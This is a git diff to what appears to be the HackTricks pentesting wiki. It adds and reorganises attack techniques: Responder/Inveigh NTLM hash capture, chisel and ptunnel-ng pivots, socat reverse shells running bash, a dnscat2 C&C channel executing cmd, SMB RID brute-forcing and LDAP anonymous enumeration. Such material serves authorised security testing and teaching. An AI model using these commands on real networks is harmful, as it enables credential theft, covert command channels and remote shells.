diff --git a/SUMMARY.md b/SUMMARY.md index 2d75203c5..2c4a2c0d9 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -364,7 +364,8 @@ * [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md) * [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) * [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) -* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb.md) +* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md) + * [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md) * [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) * [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) * [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md) diff --git a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 7de02a8fc..aade20608 100644 --- a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -138,7 +138,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs` -### DHCP Poisoning +#### Responder - DHCP Poisoning Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. 
@@ -152,7 +152,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier ./Responder.py -I eth0 -Pdv ``` -### Capturing credentials +#### Responder - Capturing credentials Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**): @@ -164,11 +164,23 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS. > Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. -[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\ +[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\ Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero). ![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png) +Or run it with more options: + +```powershell +Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y +``` + +Or run the C# version: + +```bash +Inveigh.exe +``` + ## NTML Relay Attack This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**. 
diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index 9d9ac362d..9a856d798 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -202,22 +202,6 @@ rportfwd_local [bind port] [forward host] [forward port] rportfwd_local stop [bind port] ``` -## Windows netsh - -### Port2Port - -You need to be a local admin (for any port) - -```bash -netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp -# Example: -netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 -# Check the port forward was created: -netsh interface portproxy show v4tov4 -# Delete port forward -netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444 -``` - ## reGeorg [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) @@ -236,16 +220,19 @@ You need to use the **same version for client and server** ### socks ```bash -./chisel server -p 8080 --reverse #Server -./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client +./chisel server -p 8080 --reverse #Server -- Attacker +./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim #And now you can use proxychains with port 1080 (default) + +./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed) +./chisel client -v 10.10.10.10:8080 socks #Attacker ``` ### Port forwarding ```bash -./chisel_1.7.6_linux_amd64 server -p 12312 --reverse -./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 +./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker +./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ``` ## Rpivot 
@@ -281,7 +268,7 @@ victim> python client.py --server-ip --server-port 9999 --ntl ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane -attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +attacker> socat FILE:`tty`,raw,echo=0 TCP4::1337 ``` ### Reverse shell @@ -294,13 +281,13 @@ victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ### Port2Port ```bash -socat TCP-LISTEN:,fork TCP:: & +socat TCP4-LISTEN:,fork TCP4:: & ``` ### Port2Port through socks ```bash -socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 +socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 ``` ### Meterpreter through SSL Socat 
@@ -364,6 +351,53 @@ echo y | plink.exe -l -pw [-p ] -R < echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 ``` +## Windows netsh + +### Port2Port + +You need to be a local admin (for any port) + +```bash +netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp +# Example: +netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 +# Check the port forward was created: +netsh interface portproxy show v4tov4 +# Delete port forward +netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444 +``` + +## SocksOverRDP & Proxifier + +You need to have **RDP access over the system**.\ +Download: + +1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**. +2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab) + +In your client computer load **`SocksOverRDP-Plugin.dll`** like this: + +```bash +# Load SocksOverRDP.dll using regsvr32.exe +C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll +``` + +Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**. 
+ +**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary: + +``` +C:\SocksOverRDP-x64> SocksOverRDP-Server.exe +``` + +Now, confirm in you machine (attacker) that the port 1080 is listening: + +``` +netstat -antb | findstr 1080 +``` + +Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.** + ## Proxify Windows GUI Apps You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\ @@ -423,14 +457,29 @@ ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ### DNSCat2 +****[**Download it from here**](https://github.com/iagox86/dnscat2)**.** + Establishes a C\&C channel through DNS. It doesn't need root privileges. ```bash attacker> ruby ./dnscat2.rb tunneldomain.com victim> ./dnscat2 tunneldomain.com + +# If using it in an internal network for a CTF: +attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache +victim> ./dnscat2 --dns host=10.10.10.10,port=5353 ``` -**Port forwarding with dnscat** +#### **In PowerShell** + +You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell: + +``` +Import-Module .\dnscat2.ps1 +Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd +``` + +#### **Port forwarding with dnscat** ```bash session -i 
@@ -460,11 +509,28 @@ Root is needed in both systems to create tun adapters and tunnel data between th ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` +### ptunnel-ng + +****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git). + +```bash +# Generate it +sudo ./autogen.sh + +# Server -- victim (needs to be able to receive ICMP) +sudo ptunnel-ng +# Client - Attacker +sudo ptunnel-ng -p -l -r -R +# Try to connect with SSH through ICMP tunnel +ssh -p 2222 -l user 127.0.0.1 +# Create a socks proxy through the SSH connection through the ICMP tunnel +ssh -D 9050 -p 2222 -l user 127.0.0.1 +``` + ## Other tools to check * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) -* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md index 66812a2c2..c85a23796 100644 --- a/network-services-pentesting/pentesting-ldap.md +++ b/network-services-pentesting/pentesting-ldap.md @@ -142,7 +142,7 @@ u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/) -## Clear text credentials +## Sniff clear text credentials If LDAP is used without SSL you can **sniff credentials in plain text** in the network. @@ -150,7 +150,9 @@ Also, you can perform a **MITM** attack in the network **between the LDAP server **If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again. -## Bypass TLS SNI check +## Anonymous Access + +### Bypass TLS SNI check According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user: 
@@ -158,6 +160,11 @@ According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrar ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` +### LDAP anonymous binds + +[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \ +However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD. + ## Valid Credentials If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb/README.md similarity index 76% rename from network-services-pentesting/pentesting-smb.md rename to network-services-pentesting/pentesting-smb/README.md index 84ed7f2c0..c3f94215e 100644 --- a/network-services-pentesting/pentesting-smb.md +++ b/network-services-pentesting/pentesting-smb/README.md 
@@ -51,7 +51,7 @@ With an anonymous null session you can access the IPC$ share and interact with s ## What is NTLM -If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows-hardening/ntlm/). +If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../../windows-hardening/ntlm/). ## **Enumeration** @@ -66,7 +66,7 @@ nbtscan -r 192.168.0.1/24 To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: * Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** -* \_Or\*\* this script\*\*: +* Or this script: ```bash #!/bin/sh 
@@ -127,80 +127,23 @@ rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbff /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` -### **Enumerating LSARPC and SAMR rpcclient** - -**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"** - -You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials). - -#### Server Info - -* **Server Info**: `srvinfo` - -#### Users enumeration - -* **List users**: `querydispinfo` and `enumdomusers` -* **Get user details**: `queryuser <0xrid>` -* **Get user groups**: `queryusergroups <0xrid>` -* **GET SID of a user**: `lookupnames ` -* **Get users aliases**: `queryuseraliases [builtin|domain] ` +### Enumerate Users ```bash -# Brute-Force users RIDs -for i in $(seq 500 1100); do - rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; -done +# This info should alerady being gathered from enum4linux and enum4linux-ng +crackmapexec smb 10.10.10.10 --users -# You can also use samrdump.py for this purpose +ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " + +rpcclient -U "" -N 10.10.10.10 +enumdomusers ``` -#### Groups enumeration +### **Enumerating LSARPC and SAMR rpcclient** -* **List groups**: `enumdomgroups` -* **Get group details**: `querygroup <0xrid>` -* **Get group members**: `querygroupmem <0xrid>` - -#### Aliasgroups enumeration - -* **List alias**: `enumalsgroups ` -* **Get members**: `queryaliasmem builtin|domain <0xrid>` - -#### Domains enumeration - -* **List domains**: `enumdomains` -* **Get SID**: `lsaquery` -* **Domain info**: `querydominfo` - -#### Shares enumeration - 
-* **Enumerate all available shares**: `netshareenumall` -* **Info about a share**: `netsharegetinfo ` - -#### More SIDs - -* **Find SIDs by name**: `lookupnames ` -* **Find more SIDs**: `lsaenumsid` -* **RID cycling (check more SIDs)**: `lookupsids ` - -#### **Extra commands** - -| **Command** | **Interface** | **Description** | -| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | -| queryuser | SAMR | Retrieve user information | -| querygroup | Retrieve group information | | -| querydominfo | Retrieve domain information | | -| enumdomusers | Enumerate domain users | | -| enumdomgroups | Enumerate domain groups | | -| createdomuser | Create a domain user | | -| deletedomuser | Delete a domain user | | -| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values | -| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | -| lsaaddacctrights | Add rights to a user account | | -| lsaremoveacctrights | Remove rights from a user account | | -| dsroledominfo | LSARPC-DS | Get primary domain information | -| dsenumdomtrusts | Enumerate trusted domains within an AD forest | | - -To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](135-pentesting-msrpc.md). +{% content-ref url="rpcclient-enumeration.md" %} +[rpcclient-enumeration.md](rpcclient-enumeration.md) +{% endcontent-ref %} ### GUI connection from linux 
@@ -410,10 +353,10 @@ crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute ``` -### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) +### [**psexec**](../../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/ntlm/smbexec.md) Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ -**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ +**More info** about [**psexec** ](../../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/ntlm/smbexec.md).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash @@ -426,7 +369,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** -### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec +### [wmiexec](../../windows-hardening/ntlm/wmicexec.md)/dcomexec Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ 
@@ -447,7 +390,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` -### [AtExec](../windows-hardening/ntlm/atexec.md) +### [AtExec](../../windows-hardening/ntlm/atexec.md) Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ @@ -473,7 +416,7 @@ ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid ## SMB relay attack This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ -[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap 
@@ -488,17 +431,17 @@ This happens with the functions: Which are used by some browsers and tools (like Skype) -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (93).png>) ### SMBTrap using MitMf -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (94).png>) ## NTLM Theft -Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). +Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack). -[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) +[See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md new file mode 100644 index 000000000..30eb7f407 --- /dev/null +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -0,0 +1,98 @@ +# rpcclient enumeration + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"** + +You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials). + +#### Server Info + +* **Server Info**: `srvinfo` + +#### Users enumeration + +* **List users**: `querydispinfo` and `enumdomusers` +* **Get user details**: `queryuser <0xrid>` +* **Get user groups**: `queryusergroups <0xrid>` +* **GET SID of a user**: `lookupnames ` +* **Get users aliases**: `queryuseraliases [builtin|domain] ` + +```bash +# Brute-Force users RIDs +for i in $(seq 500 1100); do + rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; +done + +# You can also use samrdump.py for this purpose +``` + +#### Groups enumeration + +* **List groups**: `enumdomgroups` +* **Get group details**: `querygroup <0xrid>` +* **Get group members**: `querygroupmem <0xrid>` + +#### Aliasgroups enumeration + +* **List alias**: `enumalsgroups ` +* **Get members**: `queryaliasmem builtin|domain <0xrid>` + +#### Domains enumeration + +* **List domains**: `enumdomains` +* **Get SID**: `lsaquery` +* **Domain info**: `querydominfo` + +#### Shares enumeration + +* **Enumerate all available shares**: `netshareenumall` +* **Info about a share**: `netsharegetinfo ` + +#### More SIDs + +* **Find SIDs by name**: `lookupnames ` +* **Find more SIDs**: `lsaenumsid` +* **RID cycling (check more SIDs)**: `lookupsids ` + +#### **Extra commands** + +| **Command** | **Interface** | **Description** | +| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | 
----------------------------------------------------------------------------------------------------------------------------------------- | +| queryuser | SAMR | Retrieve user information | +| querygroup | Retrieve group information | | +| querydominfo | Retrieve domain information | | +| enumdomusers | Enumerate domain users | | +| enumdomgroups | Enumerate domain groups | | +| createdomuser | Create a domain user | | +| deletedomuser | Delete a domain user | | +| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values | +| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | +| lsaaddacctrights | Add rights to a user account | | +| lsaremoveacctrights | Remove rights from a user account | | +| dsroledominfo | LSARPC-DS | Get primary domain information | +| dsenumdomtrusts | Enumerate trusted domains within an AD forest | | + +To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 0b6d85315..6f76ea19f 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -60,10 +60,20 @@ If you just have access to an AD environment but you don't have any credentials/ * `enum4linux -a -u "" -p "" && enum4linux -a -u "guest" -p "" ` * `smbmap -u "" -p "" -P 445 -H && smbmap -u "guest" -p "" -P 445 -H ` * `smbclient -U '%' -L // && smbclient -U 'guest%' -L //` - * [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../network-services-pentesting/pentesting-smb.md) + * A more detailed guide on how to enumerate a SMB server can be found here: + +{% content-ref url="../../network-services-pentesting/pentesting-smb/" %} +[pentesting-smb](../../network-services-pentesting/pentesting-smb/) +{% endcontent-ref %} + * **Enumerate Ldap** * `nmap -n -sV --script "ldap* and not brute" -p 389 ` - * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md) + * A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**): + +{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} +[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) +{% endcontent-ref %} + * **Poison the network** * Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) 
diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md index ca8a9570c..1721d52ae 100644 --- a/windows-hardening/active-directory-methodology/pass-the-ticket.md +++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md @@ -59,6 +59,10 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket ``` {% endcode %} +## References + +* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) + **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. diff --git a/windows-hardening/active-directory-methodology/password-spraying.md b/windows-hardening/active-directory-methodology/password-spraying.md index 07a3ad798..8806dc930 100644 --- a/windows-hardening/active-directory-methodology/password-spraying.md +++ b/windows-hardening/active-directory-methodology/password-spraying.md @@ -23,11 +23,24 @@ Notice that you **could lockout some accounts if you try several wrong passwords ### Get password policy -If you have some user credentials or a shell as a domain user you can get the password policy with: +If you have some user credentials or a shell as a domain user you can **get the password policy with**: -* `crackmapexec -u 'user' -p 'password' --pass-pol` -* `enum4linx -u 'username' -p 'password' -P ` -* `(Get-DomainPolicy)."SystemAccess" #From powerview` +```bash +# From Linux +crackmapexec -u 'user' -p 'password' --pass-pol + +enum4linx -u 'username' -p 'password' -P + +rpcclient -U "" -N 10.10.10.10; +rpcclient $>querydominfo + +ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength + +# From Windows +net accounts + +(Get-DomainPolicy)."SystemAccess" #From powerview +``` ### Exploitation 
diff --git a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md index cfdcb023e..388cb27e4 100644 --- a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md +++ b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md 
@@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names. -After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\ +After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack. 
+{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} +[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +{% endcontent-ref %} ## **AD Recycle Bin**
